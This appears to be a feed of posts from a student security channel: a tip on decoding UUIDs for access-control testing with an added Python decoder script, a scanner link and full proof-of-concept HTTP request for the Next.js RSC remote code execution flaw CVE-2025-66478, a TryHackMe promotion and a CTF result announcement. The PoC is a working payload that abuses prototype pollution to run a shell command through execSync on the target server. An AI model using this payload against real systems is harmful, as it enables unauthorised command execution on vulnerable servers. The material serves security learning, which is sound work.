SecList for CyberStudents
During a web application penetration test, we always aim to identify BAC (Broken Access Control), IDOR and similar vulnerabilities. Along the way, we often encounter parameters such as “id=”, “user=”, or sometimes more complex ones like UUIDs. While guessing a UUID is nearly impossible, it’s still worth analyzing, as doing so increases our chances of discovering high‑severity issues.

Even when we’re fully authenticated, we can inspect these parameters through Burp Suite or any other proxy tool. What I want to highlight is that UUIDs can sometimes be analyzed using online tools like https://www.uuidtools.com/decode . It won’t always work (this often depends on how the developer implemented the system), but if decoding the UUID gives the desired result, you can expect to find some good bugs.

Happy hacking, go to find your bugs! 🐞🔥

#Web #BugBounty #Pentest #UUID
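As an added example (not part of the original post or the uuidtools site), this script does offline what the decoder above does: it classifies a UUID by version and, for time-based version-1 values, recovers the embedded timestamp, clock sequence and node, which is exactly why such identifiers are predictable. The SAMPLE_PARAMS dictionary and the parameter names in it are constructed for illustration.

```python
import uuid
from datetime import datetime, timedelta, timezone

# RFC 4122 version-1 timestamps count 100 ns ticks since the Gregorian reform date.
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)


def analyze_uuid(text: str) -> dict:
    """Classify one UUID and, for version 1, recover the timestamp, clock sequence and node it embeds."""
    u = uuid.UUID(text)
    info = {"uuid": str(u), "version": u.version, "variant": u.variant, "predictable": False}
    if u.version == 1:
        # u.time is the 60-bit timestamp in 100 ns units; integer-divide by 10 for microseconds.
        when = GREGORIAN_EPOCH + timedelta(microseconds=u.time // 10)
        info.update(
            timestamp=when.isoformat(),
            clock_seq=u.clock_seq,
            node=f"{u.node:012x}",
            # A set multicast bit in the first node octet means the node was randomised, not a MAC address.
            node_is_random=bool((u.node >> 40) & 1),
            predictable=True,  # time-based, so neighbouring values can be enumerated
        )
    return info


def find_predictable_ids(params: dict) -> dict:
    """Return the request parameters whose values are version-1 UUIDs, with their decoded fields."""
    findings = {}
    for name, value in params.items():
        try:
            info = analyze_uuid(value)
        except ValueError:
            continue  # not a UUID at all, nothing to decode
        if info["predictable"]:
            findings[name] = info
    return findings


# Constructed sample: the first value is the well-known RFC 4122 DNS namespace UUID (version 1),
# the second is a freshly generated version-4 UUID, the third is not a UUID at all.
SAMPLE_PARAMS = {
    "user": "6ba7b810-9dad-11d1-80b4-00c04fd430c8",
    "session": str(uuid.uuid4()),
    "id": "42",
}

if __name__ == "__main__":
    for name, info in find_predictable_ids(SAMPLE_PARAMS).items():
        kind = "random-node" if info["node_is_random"] else "mac-node"
        print(name, info["timestamp"], info["node"], kind)
```

A version-1 hit tells you the identifier leaks creation time and generating host, and that values issued around the same moment differ only in the low timestamp bits; a version-4 value carries no such structure.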
React2Shell Ultimate - The most comprehensive CVE-2025-66478 Scanner for Next.js RSC RCE vulnerability. Multi-mode detection, WAF bypass, local scanning.

https://github.com/hackersatyamrastogi/react2shell-ultimate
POC:

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 744

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('whoami',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
In the field of cybersecurity, it is essential to continuously study publicly available exploits and vulnerabilities discovered in particular technologies. You can learn how to use the latest emerging exploits through the "recent-threats" module available on TryHackMe at https://tryhackme.com/module/recent-threats . I hope this will be useful for you!

#tryhackme #pentest #cybersecurity #CVE
Forwarded from Turan Security
🏆 12th place at the BlackHat MEA 2025 CTF competition!

☠️ The team defending the honour of Turan Security and 🇺🇿 Uzbekistan took a place in the TOP-12 out of 125 teams at one of the world's most prestigious cybersecurity competitions!

The BlackHat MEA event, held in Riyadh, Saudi Arabia, is the arena where the strongest specialists, experts and the world's leading cybersecurity teams meet on a global scale.

Among the TOP teams, our team lead achieved the following in 3 high-difficulty tasks:
🚩 Firstblood - web, first;
🚩 Firstblood - forensics, first;
🚩 Secondblood - web, second to capture the flag.

Our goal is to raise Uzbekistan's prestige in the international arena, inspire young people and contribute to the development of the cybersecurity field.